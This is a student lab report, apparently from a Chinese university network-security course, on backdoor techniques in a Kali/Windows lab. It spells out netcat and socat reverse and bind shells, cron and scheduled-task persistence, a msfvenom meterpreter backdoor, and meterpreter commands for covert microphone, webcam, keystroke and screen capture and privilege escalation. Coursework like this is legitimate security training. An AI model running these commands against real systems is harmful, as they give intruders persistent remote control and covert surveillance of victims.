Exp2 后门原理与实践-------20164325王晓蕊
Exp2 后门原理与实践
任务一:使用netcat获取主机操作Shell,cron启动
1.windows获取linux shell
1.1 ipconfig 查看本机查看以太网适配器(8)的ipv4地址
1.2windows: ncat.exe -l -p 调用ncat.exe程序来蹲守本机的4325端口
1.3 nc –e /bin/sh 在Kali环境下,使用nc指令的-e参数反向连接Windows主机的4325端口:
2.linux获得windows shell
2.1 Kali : ifconfig 命令查看IP
2.2 kali: nc –l –p 使用nc指令蹲守4325端口。
2.3 Windows: ncat.exe –e cmd.exe 调用ncat.exe程序并用-e参数反向连接Kali主机的4325端口。
3. 使用nc传输数据
3.1 ncat.exe –l Windows下蹲守4325端口
3.2 nc 建立连接
3.3 之后就可以传输数据了,在kali上打字,windows主机屏幕上也会显示你打的内容。
4. 使用netcat获取主机操作Shell,cron启动
4.1 windows: ncat.exe -l -p 监听本地4325端口
4.2crontab -e编辑一条定时任务,选择编辑器时选择基本的vim编辑器就行(3号)。
点i进行编辑,在最后一行编辑 * * * * /bin/netcat -e /bin/sh ( :wq 保存退出),这里我选择的是每小时的第三分钟。
4.3 等到了10:03分的时候就可以在windows中查看了。
任务二:使用socat获取主机操作Shell, 任务计划启动
2.1在Windows系统下,打开:控制面板->系统和安全->管理工具->任务计划程序,在操作选项(菜单栏)中,选择“创建任务”。
- 名称:20164325
- 新建触发器,选择开始任务时间为:工作站锁定时。
- 新建操作,选择启动的程序为 socat.exe ,参数项填为 tcp-listen: exec:cmd.exe,pty,stderr ,含义为:把cmd.exe绑定到端口号,同时把cmd.exe的stderr重定向到stdout上
- 运行任务
2.2在kali终端输入指令 socat - tcp:
注意:之前的任务我都是用的以太网适配器vmware network adapter vmnet1 在之前的任务中都可以成功,就是这个任务会出现问题,问了同学才知道,要用以太网适配器vmware network adapter vmnet8的ipv4,解决的问题。
任务三:使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell
3.1Kali: msfvenom -p windows/meterpreter/reverse_tcp LHOST= -f exe > 20164325_backdoor.exe ,注意这里的IP地址为控制端IP,即在kali上查的IP,可见已经生成了后门程序“ 20164325_backdoor.exe ”
3.2Windows: ncat.exe -lv > 20164325_backdoor.exe ,这样被控主机就进入了接收文件模式,开始传输中的时候是只有前两行,下面是连接上了,文件传输成功的截图
3.3在kali中执行 nc < 20164325_backdoor.exe ,注意这里的IP为被控主机IP,即WindowsIP (ps:这里我出现了问题,所以我就把三个可用的ipv4地址都试了一下,结果是无线局域网的可以使用)
在Kali上使用 msfconsole 指令进入msf控制台
- use exploit/multi/handler 使用监听模块,设置payload
- set payload windows/meterpreter/reverse_tcp ,使用和生成后门程序时相同的payload
- set LHOST 192.168.113.133 ,这里用的是kali IP,和生成后门程序时指定的IP相同
- ,同样要使用相同的端口
3.5设置完成后,执行监听
(我是双击的后门文件,来开启的)以下是监听结果,开启后门文件之前就只有前一行。
任务四:使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权
4.1目标主机音频
使用 record_mic 指令可以截获一段音频,可以用 -d 选项设置录制时间
4.2摄像头
webcam_snap 指令可以使用摄像头进行偷拍
webcam stream 指令可以使用摄像头进行录像
4.3击键记录
keyscan_start 指令开始记录下击键的过程
keyscan_dump 指令读取击键的记录
(第一行我实在命令行中输入的指令,随便输入的;第二行就是在word里面输入的,后面的一些东西是我按的空格)
4.4提权
getuid 指令查看当前用户
getsystem 指令进行提权
4.5截屏
screenshot 指令可以进行截屏,效果如下:
五.实验总结与体会
这次实验我吸取了上次实验的教训,对虚拟机的操作更加的顺利,但是我在ip地址的部分出了很多问题,第一次实在任务三的时候;会出现攻击者的ip和被攻击者的ip混的情况,这也是没有清楚原理的表现,这种情况就是刚开始做的时候会出现,但是之后就不会出现这种问题了;还有一个问题,就是要随时检查windows的ip和kali的ip,避免实验出现问题。做任务四的时候真的感受到了恐怖,之后一定会对自己的电脑做好防护。
六.基础问题回答
(1)例举你能想到的一个后门进入到你系统中的可能方式?
答:这个实验中的后门就是运行一个程序,双击就能开启后门,让人监听;所以我觉得它可能无处不在,会在软件里双击打开,或者安装时就会出现;我觉得还会在网页中打开吧,比如说有一个链接,就会连着后门文件;应该也会潜在下载的文件啊啥的,能打开的东西上。
(2)例举你知道的后门如何启动起来(win及linux)的方式?
答:伪装吧,让计算机中的防火墙和杀毒软件不会直把它灭掉,以为是什么其他的安全软件;我觉得还可能是更改被攻击主机的什么设置,让主机找不到这个后门。
像实验中所说的:Linux可以使用cron启动,Windows下通过任务计划来启动后门程序。
(3)Meterpreter有哪些给你映像深刻的功能?
答:获取摄像头权限进行拍照和视频,录音,提升用户权限等等都很恐怖深刻。
(4)如何发现自己有系统有没有被安装后门?
答:杀毒软件等等的那种防护检查漏洞的软件,来检查是否安装后门。
Exp2 后门原理与实践-------20164325王晓蕊的更多相关文章
- Exp3 免杀原理与实践 ——20164325王晓蕊
一.实践基本内容 1.实践目标 (1) 正确使用msf编码器(√),msfvenom生成如jar之类的其他文件(√),veil-evasion(√),加壳工具(√),使用shellcode编程(√) ...
- 2018-2019-2 网络对抗技术 20165232 Exp2 后门原理与实践
2018-2019-2 网络对抗技术 20165232 Exp2 后门原理与实践 1. 后门原理与实践实验说明及预备知识 一.实验说明 任务一:使用netcat获取主机操作Shell,cron启动 ( ...
- 20155324《网络对抗》Exp2 后门原理与实践
20155324<网络对抗>Exp2 后门原理与实践 20155324<网络对抗>Exp2 后门原理与实践 常用后门工具实践 Windows获得Linux Shell 在Win ...
- 2018-2019-2 20165237《网络对抗技术》Exp2 后门原理与实践
2018-2019-2 20165237<网络对抗技术>Exp2 后门原理与实践 一.实践目标 使用netcat获取主机操作Shell,cron启动 使用socat获取主机操作Shell, ...
- 2018-2019-2 网络对抗技术 20165325 Exp2 后门原理与实践
2018-2019-2 网络对抗技术 20165325 Exp2 后门原理与实践 实验内容(概要): (1)使用netcat获取主机Shell,cron启动 首先两个电脑(虚拟机)都得有netcat, ...
- 2018-2019-2 网络对抗技术 20165206 Exp2 后门原理与实践
- 2018-2019-2 网络对抗技术 20165206 Exp2 后门原理与实践 - 实验任务 (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用socat获取主 ...
- 2018-2019-2 网络对抗技术 20165323 Exp2 后门原理与实践
2018-2019-2 网络对抗技术 20165323 Exp2 后门原理与实践 一.实验要求 (3.5分) (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用soc ...
- 2018-2019-2 20165235《网络对抗技术》Exp2 后门原理与实践
2018-2019-2 20165235<网络对抗技术>Exp2 后门原理与实践 实验内容 1.使用netcat获取主机操作Shell,cron启动 2.使用socat获取主机操作Shel ...
- 2018-2019-2 网络对抗技术 20165311 Exp2 后门原理与实践
2018-2019-2 网络对抗技术 20165311 Exp2 后门原理与实践 后门的基本概念 常用后门工具 netcat Win获得Linux Shell Linux获得Win Shell Met ...
随机推荐
- maven工程 添加本地jar依赖
和第三方平台对接的时候要用到对方提供的一个jar包,jar包怎么直接添加到pom文件的依赖中呢? jar包一般都是公共的,要上传到私服仓库.我们都是直接登录私服,操作仓库. 登录私服可以在项目的pom ...
- jdk1.7/1.8 HashMap、ConcurrentHashMap详解
摘要: 本文主要参考网上Blog(详见Reference)总结ConcurrentHashMap的各方面知识,方便复习 转自:https://my.oschina.net/hosee/blog/675 ...
- CentOS7+CDH5.14.0安装全流程记录,图文详解全程实测-5安装JDK及安装mysql数据库
1.安装JDK 可以不用卸载自带的openjdk,配好环境变量即可. 下载文件:jdk-8u151-linux-x64.tar.gz 附:JDK各版本下载地址:https://www.oracle.c ...
- python note 09 初识函数
1.函数 def my_len(): #自定义函数(相当于len) i = 0 for k in s: i += 1 print(i) print(my_len()) #输出None,因为没有返回值 ...
- hibernate的理解
emm~这里就是记录一下,hibernate的save,如果存在id,就可以直接save,就会覆盖原有的,如果不存在id就会在数据库创建一条新的记录 package edu.zut.cs.zutnlp ...
- JavaScript并发模型与Event Loop (转载)
并发模型可视化描述 model.svg 如上图所示,Javascript执行引擎的主线程运行的时候,产生堆(heap)和栈(stack),程序中代码依次进入栈中等待执行, 若执行时遇到异步方法,该异步 ...
- windows安装oracle遇INS 30131 错误
win2008 64位安装oracle 11.2.0.4也遇到INS 30131 错误 描述: 原因 - 无法访问临时位置. 操作 - 请确保当前用户具有访问临时位置所需的权限. 附加信息: - 所有 ...
- select2插件用法
1.修改默认查询方法,使其可以根据value查询 this.element.select2({ allowClear: true, matcher: function (term, text, ele ...
- Spring Cloud Eureka的集群配置(六)
1.再次创建2个Eureka工程 工程名:microservicecloud-eureka-7002 工程名:microservicecloud-eureka-7003 2.pom.xml文件 < ...
- pip install rrdtool
fatal error: rrd.h: No such file or directory apt-get install librrd-dev